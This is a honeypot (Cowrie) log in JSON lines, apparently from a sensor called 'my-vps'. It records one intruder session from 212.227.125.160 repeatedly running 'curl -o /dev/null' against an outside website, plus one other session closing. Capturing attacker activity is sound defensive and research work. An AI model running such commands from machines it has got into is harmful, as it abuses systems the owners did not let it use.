{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.551708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.588652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.589559Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.626936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.628237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.666750Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.667746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.705616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.706805Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.744471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.745714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.783485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.784543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.896247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.897173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.988788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.990222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.050303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.051496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.090638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.091622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.145287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.146482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.191558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.192449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.242482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.243404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.378603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.379911Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.433594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.434469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":34.212793827056885,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.458834Z","src_ip":"8.222.212.69","session":"69bb13a80e72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.473190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.474013Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.511740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.512717Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.562737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.563663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.602001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.603068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.640712Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.641588Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.679683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.680604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.727377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.728390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.772571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.773465Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.817229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.818061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.858777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.859832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.907480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.908496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.947606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.948495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:34.998468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:34.999352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.038978Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.039896Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.076692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.077513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.118614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.119763Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.158797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.159744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.200475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.201384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.257616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.258837Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.297654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.298592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.338620Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.339572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.376531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.377669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.427334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.428241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.464515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.465351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.502991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.503922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.541911Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.542814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.583616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.584478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.620790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.621601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.658266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.659137Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.695361Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.696387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.733658Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.734530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.802616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.803633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.866487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.867493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.914782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.915722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:35.956447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:35.957325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.000707Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.002524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.050728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.051733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.092515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.093532Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.131669Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.133529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.176935Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.177987Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.226551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.227732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.264849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.266225Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.319773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.320919Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.363216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.364325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.403035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.404409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.445122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.446111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.485830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.486949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.525253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.526384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.566170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.567055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.604878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
